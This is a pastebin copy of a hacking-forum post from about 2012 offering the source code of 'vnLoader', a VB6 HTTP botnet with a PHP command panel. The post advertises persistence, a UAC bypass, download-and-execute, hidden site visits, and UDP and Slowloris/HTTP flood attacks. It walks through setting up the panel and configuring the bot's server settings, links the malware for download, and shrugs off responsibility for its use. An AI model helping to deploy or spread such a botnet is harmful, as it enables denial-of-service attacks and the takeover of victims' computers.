Advertisement
causevd

thread

Nov 23rd, 2012
6,721
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.89 KB | None | 0 0
  1. [quote='van1lle' pid='15837637' dateline='1316448391']
  2. [align=center][img]http://img846.imageshack.us/img846/1038/logoxx.png[/img][/align]
  3. [color=white]
  4. Hey guys!
  5. I'm presenting my HTTP Bot called 'vnLoader' i was coding it about 1 year ago for a couple of months. I don't use it anymore so I gonna share this with you.
  6. It only lays around on my computer. So why not giving something to the community.
  7. [/color]
  8.  
  9. [color=#1E90FF]About the Bot:[/color][list]
  10. [*][color=white]Coded in VB6[/color]
  11. [*][color=#828282]Startup (of course)[/color]
  12. [*][color=white]Mutex (of course)[/color]
  13. [*][color=#828282]Copy & Paste UAC Bypass[/color]
  14. [*][color=white]Commands:[/color][list]
  15. [*][color=#828282]Download & Execute[/color]
  16. [*][color=white]Update[/color]
  17. [*][color=#828282]Remove[/color]
  18. [*][color=white]Visit Website (visible/hidden)[/color]
  19. [*][color=#828282]UDP Flood[/color]
  20. [color=white]> attacks random ports[/color]
  21. [*][color=#828282]HTTP Flood
  22. [color=white]> if server is vulnerable to Slowloris -> Slowloris attack[/color]
  23. [color=#828282]> else -> HTTP Get Flood[/color][/list]
  24. [*][color=white]Uses Sockets to connect![/color][/list][/color]
  25. [color=#1E90FF]About the Webpanel:[/color][list]
  26. [*][color=white]Coded in PHP ( + a bit Javascript )[/color]
  27. [*][color=#828282]High customizable taskcreation[/color]
  28. [*][color=white]Statistics, Botlist, Tasklist, etc.[/color]
  29. [*][color=#828282]Account system (take a look at the picture below)[/color][/list]
  30.  
  31. [color=#1E90FF]Screenshots of the Webpanel:[/color]
  32. [list][color=#FF0000]Attention - big images![/color]
  33. [*][spoiler=Statistics][IMG]http://img684.imageshack.us/img684/6840/botkmo.png[/IMG][/spoiler]
  34. [*][spoiler=Botlist][IMG]http://img571.imageshack.us/img571/6083/bot1l.png[/IMG][/spoiler]
  35. [*][spoiler=Task creation][IMG]http://img268.imageshack.us/img268/9886/bot2l.png[/IMG][/spoiler]
  36. [*][spoiler=Account managements][IMG]http://img835.imageshack.us/img835/5021/bot3b.png[/IMG][/spoiler][/list]
  37.  
  38. [color=#1E90FF]How to install the Webpanel:[/color][list]
  39. [*][color=white]1. Create a mysql database (won't explain how that works)[/color]
  40. [*][color=#828282]2. After downloading the source browse to your php files.[/color]
  41. [*][color=white]3. Open "sql.inc.php" and configure it to your mysql server/database[/color]
  42. [php]
  43. @mysql_connect("dbserver", "dbusername", "dbpassword");
  44. @mysql_select_db("dbname");[/php]
  45. [*][color=#828282]4. Upload everything to your webserver[/color]
  46. [*][color=white]5. Browse in your Internet Browser to http://yourserver.com/yourwebpanel/[color=red]install.php[/color][/color]
  47. [*][color=#828282]6. Enter a username and a password for your webpanel and click "Install". Wait until the script is done.[/color][/list]
  48.  
  49. [color=#1E90FF]How to compile the bot:[/color][list]
  50. [*][color=white]1. Open the project in your Visual Basic 6.0 IDE[/color]
  51. [*][color=#828282]2. Search for "Form_Load" in Form1[/color]
  52. [*][color=white]3. Configure it like this.[/color]
  53. [code]'FOR EXAMPLE OUR WEBPANEL IS HERE: http://someserver.com/vnloader/
  54.  
  55. Server = "someserver.com" 'Your Domain (without: "http://" or "www.")
  56. Prefix = "/vnLoader/" 'Path to the folder of the webpanel
  57. Password = "updateandremovepassword" 'Password for the update command
  58. Mutex = "Something Random Here" 'Mutex
  59. StartUp = "Startupkey" 'Startupkey[/code]
  60. [*][color=#828282]4. Compile[/color]
  61. [*][color=white]5. ???[/color]
  62. [*][color=#828282]6. Profit[/color][/list]
  63.  
  64. [color=#1E90FF]Download:[/color][list]
  65. [*][color=white][url]http://www.mediafire.com/?i1fgaz842c9c9l8[/url][/color]
  66. [*][color=#828282]Don't ask for virusscans these are only sourcecodes![/color][/list]
  67.  
  68. Enjoy anyone (:
  69. If you have questions ask here in thread, do not PM me since PM limit is 50, wich is reached fastly.
  70. Also search in the thread if you have problems. Maybe someone already solved them :b
  71.  
  72. Ahhh, by the way what i almost missed.
  73. I'm not responsible for what you do with this :P
  74. [/quote]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement